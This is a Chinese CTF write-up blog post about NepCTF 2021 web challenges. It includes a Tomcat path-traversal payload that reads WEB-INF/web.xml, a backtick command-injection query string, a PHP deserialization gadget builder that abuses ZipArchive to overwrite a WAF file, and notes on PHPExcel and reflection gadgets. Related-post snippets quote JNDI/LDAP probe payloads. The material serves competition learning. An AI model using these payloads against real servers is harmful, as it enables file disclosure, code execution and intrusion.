Nepnep 2021

最新推荐文章于 2022-07-21 20:38:18 发布
最新推荐文章于 2022-07-21 20:38:18 发布
阅读量408 收藏
点赞数 1
分类专栏: CTF复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anwen12/article/details/115260823
版权

Nepnep 2021

小评价:题目原题比较多,payload好多通杀。不算上非预期的话,题目质量挺好的。

0x01 Easy_Tomcat

注册源码读取,头像老梗了。

tomcat的常用目录

static/img/../../WEB-INF/web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>LoginServlet</servlet-name>
        <servlet-class>javademo.LoginServlet</servlet-class>
    </servlet>
    <servlet>
        <servlet-name>RegisterServlet</servlet-name>
        <servlet-class>javademo.RegisterServlet</servlet-class>
    </servlet>
    <servlet>
        <servlet-name>AdminServlet</servlet-name>
        <servlet-class>javademo.AdminServlet</servlet-class>
    </servlet>
    <servlet>
        <servlet-name>InitServlet</servlet-name>
        <servlet-class>javademo.InitServlet</servlet-class>
        <load-on-startup>1</load-on-startup>

    </servlet>
    <servlet-mapping>
        <servlet-name>LoginServlet</servlet-name>
        <url-pattern>/LoginServlet</url-pattern>
    </servlet-mapping>
    <servlet-mapping>
        <servlet-name>RegisterServlet</servlet-name>
        <url-pattern>/RegisterServlet</url-pattern>
    </servlet-mapping>
    <servlet-mapping>
        <servlet-name>AdminServlet</servlet-name>
        <url-pattern>/AdminServlet</url-pattern>
    </servlet-mapping>
    <servlet-mapping>
        <servlet-name>InitServlet</servlet-name>
        <url-pattern>/InitServlet</url-pattern>
    </servlet-mapping>
</web-app>

在这里插入图片描述

0x02 little_trick

$nep=`$nep`;ls>z&len=7

我觉得这个解法太巧妙了,循环嵌套,直呼一个骚

0x03 梦里花开牡丹亭

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;
    public  $file;
    public  $filename;
    public  $content;
    public function __construct($file,$register,$filename,$content,$username,$password){
        $this->file=$file;
        $this->register=$register;
        $this->filename=$filename;
        $this->content=$content;
        $this->username=$username;
        $this->password=$password;
    }
}
class login{
    public $file;
    public $filename;
    public $content;
    public function __construct($file,$filename,$content){
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }
}
class Open{

}

$Open=new Open();
$a =new ZipArchive();
#$Game=new Game($Open,'admin','php://filter/read=convert.base64-encode/resource=shell','o\t /flag','admin','admin');
$Game = new Game($a,"admin","waf.txt",ZipArchive::OVERWRITE,"admin","admin");
echo base64_encode(serialize($Game));

0x04 faka

借鉴wmctf的一道题

http://ff4e4f5e-5a03-4a6f-867a-dcb9d63c3133.node1.hackingfor.fun/static/upload/tmp/a108d8667a0b3ba6/28f4af46bc614b6b.jpg

image-20210325115316698

image-20210327084534291

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hOlgMsjz-1616811455255)(https://i.loli.net/2021/03/27/mzeAHxs7qnaFOGc.png)]

只要满足图中的条件就可以触发__call函数了。

或者直接简化为

$a=new PHPExcel_CachedObjectStorage_SQLite($_DBHandle,'123');//触发output的call

简简单单的午饭。其他地方就不跟着分析,大家继续玩。

0x05 bbxhh_revenge

php5之后加入的新特性,利用php自带的原生类反射,来达到命令执行。

https://www.php.net/manual/zh/reflectionfunction.invokeargs.php

image-20210327101610082

0x06 梦⾥花开牡丹亭

php 反序列化中 原生类的利用。

Dem0@
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NepNep-Java部分1
08-03
在“NepNep-Java部分1”中,我们看到了如何利用这些漏洞进行攻击。 首先,描述中提到的`baby gadget v1.0`有一个初始的漏洞,允许用户通过爆破得到管理员账号`admin`的密码,即`admin123`。进入后台后,发现`...
Neptune-Discord-Bot:基于HyperDimension Neptunia角色Neptune的Discord Bot
02-10
海王星-Discord-Bot 基于HyperDimension Neptunia角色海王星的Discord Bot ...将先前的消息翻译成NepNep 英文到UwU转换器 服务器日志 图像放大 甚至更多jpeg 指令 “!Nep帮助”可以显示完整的命令列表。
NepNep wp
weixin_45805993的博客
03-23 404
1.Little_Trick <?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(strlen($nep)<13){ eval(substr($nep,0,$len)); }else{ die('too long!'); } ?> Len=-1的时候可以绕过s
NEP提案1
lmy0930的博客
10-29 393
文章目录什么是NEPNEP基本原理NEP类型NEP工作流程怎么才是一个合格的NEPNEP格式和模板NEP序言附件NEP所有权转让NEP编辑者NEP编辑者的职责和工作流程历史 什么是NEP NEP是NEO改进协议。一份NEP是一份设计文档用于给给NEO社区提供信息,或是描述一个NEO的新特性或其工序或环境。NEP需要对特性提供一份简要的技术说明以及基本原理。NEP的作者有责任在社区内构建舆论和编辑不...
NepCTF2022 招新赛 crypto篇
m0_62506844的博客
07-21 794
动态更新至全部复现完成还是太菜了,看了wp依然是学到了很多,发现nep的密码师傅们经验也太丰富了! 根据加密流程,可以构造等式: P(P(P(P(P(Pm+k0)+k1)+k2)+k3)+k4)+k5=m∗P6+∑Pik5−iP(P(P(P(P(Pm+k0)+k1)+k2)+k3)+k4)+k5=m*P^6+\sum P^ik_{5-i}P(P(P(P(P(Pm+k0)+k1)+k2)+k3)+k4)+k5=m∗P6+∑Pik5−i​ 已知明文前四个字节 “flag”,和密文,也就是已知一组明密文,利用已知
Nepnep战队:哪有什么一战成名,其实都是百炼成钢
Cyberpeace的博客
11-29 1177
​​11月15日9:00,第七届XCTF国际网络攻防联赛分站赛L3HCTF 2021圆满落幕。Nepnep战队横空出世、问鼎冠军,出现在众人视野。 一支成立两年的新兴战队,是如何快速走到今天的?好奇心驱使我们找到了Nepnep战队,来听听他们夺冠背后的故事。 “ 尽管叫我无名之辈 Nepnep战队成立于2019年11月,成立初衷是为了营造更好的交流氛围、共享资源、解决几个高校CTF社团发展受限的问题。成立之后,各个高校的社团负责人自发组成了Nepnep的管理工作组,负责日常的竞赛报名和招新运营等工作。一路走
NepCTF2021-Web部分(除画皮)
Y4tacker的博客
03-22 3348
文章目录little_trickfaka_revengeEasy_Tomcatbbxhh_revenge非预期预期 little_trick 打开环境发现代码是这个,太简单了,签到题 <?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)&lt
NepCTF2021一些web题目的总结与复现
feng的博客
03-23 3847
前言 参加了今年的NepCTF,题目质量很好,就是周末事情比较多,而且只会php,没有全身心去做,
“画皮”漏洞
程序人生,学海无涯
12-24 1041
沿用了十多年的安全认证体系正面临前所未有的挑战。金山毒霸安全中心不久前全球率先发现了一个系统高危漏洞“画皮”,影响所有Windows系统。病毒木马等恶意程序利用该漏洞可轻松绕过99%的杀毒软件。微软今日发布了针对性的安全补丁,并对金山毒霸公开致谢。   微软在“补丁星期二”(美国时间)照例更新了12月份的安全补丁,今日共修复了11个系统漏洞,其中公告号为“MS13-098”的补丁尤其严重,影响
[操作系统学习笔记]Operating System(二)
Y4tacker的博客
03-28 408
@Author:Y4tacker 文章目录Operating System(二)operating System definitionother definitionLayers of Computer SystemServices Provided by the Operating SystemCPU modeKernel(内核)Ease of Evolution of an Operating SystemProcessesSome definitionConsists of three compone
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4613
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
[CTF复现]湖湘杯2021
anwen12的博客
12-14 3783
go_web 今天又是学爆guoke哥哥博客的一天 0x01 MultistageAgency 通过看源码 我们发现 这个题是三个服务 su - web -c "/code/bin/web 2>&1 >/code/logs/web.log &" su - web -c "/code/bin/proxy 2>&1 >/code/logs/proxy.log &" /code/bin/server 2>&1 >/code/log
HGAME2021 - 梦的开始
anwen12的博客
03-01 2202
HGAME2021 - 梦的开始 WEB 0x01 200OK! 参考链接:https://blog.csdn.net/anwen12/article/details/113728065 0x02 LazyDogR4U 一个简单的代码审计类的问题 这是提示 这里请不要像沙雕的博主一样,将简单的替换为空,理解为需要找寻其他的系统变量,因为所有的变量都已经被制空了。至于需要一个已经登陆的账号,0e的MD5绕过大可不必再说。 0x03 LIKI的生日礼物 题目的初步探索,没有注入,没有购买逻辑漏洞,有的只有竞
buu-day10
anwen12的博客
01-27 2173
0x01 [红明谷CTF 2021]JavaWeb /;/json绕过权限校验,然后漏洞探测 ["java.net.InetAddress","khl16k.dnslog.cn"] ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}] ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"
HGAME-http欺骗
anwen12的博客
02-06 1420
https欺骗 0x01 原理分析 http走私是一个很神奇的攻击方式,他根本产生的原因是因为不同服务器对于RFC协议的执行情况不同。这里面最常见的一个例子就是CDN加速。用户通过链接距离其最近的反向代理服务器,当用户请求的静态资源在CDN服务器上有备份的时候,那么就不需要再继续进行下去了,就可以直接获取到想要的数据。 当我们向代理服务器发送一个比较模糊的HTTP请求的时候,由于两者的实现方式不同,那我们就可以浑水摸鱼,让代理服务器将我们的请求完整地转发到后端服务器,但后端服务器通过CL和TE头的检测来判
[CTF复现]hition2021复现
anwen12的博客
12-13 1238
orange师傅yyds! 0x01 Wa3rmup PHP yaml_parse 这个函数在官方文档中有提到 It seams the YAML standard version here is the 1.1 and not the (1.2 released in 2009), so all of the following values: y, Y, yes, Yes, YES, n, N, no, No, NO, true, True, TRUE, false, False, FALSE, on,
welcome_CAT_CTF
最新发布
07-28
根据引用\[1\]中的描述,"welcome_CAT_CTF"是一个题目中的关键点,通过控制@的移动和输入j来增加猫币,当猫币大于100000000时可以获得flag。而根据引用\[2\]中的描述,flag可能隐藏在osu游戏的谱面中,需要打开osz文件进行查看。另外,引用\[3\]中提到了一个流量包的解压密码是伪加密的,可以通过修改文件来正常解压。综合这些信息,我无法直接回答"welcome_CAT_CTF"的具体含义或解法,因为缺少相关的引用内容。请提供更多的引用内容或提供更具体的问题,我将尽力帮助您。 #### 引用[.reference_title] - *1* [【nepnep&cat ctf】welcome_CAT_CTF](https://blog.csdn.net/qq_42220888/article/details/128531498)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [NepCTF2022 WP](https://blog.csdn.net/not_code_god/article/details/125883979)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值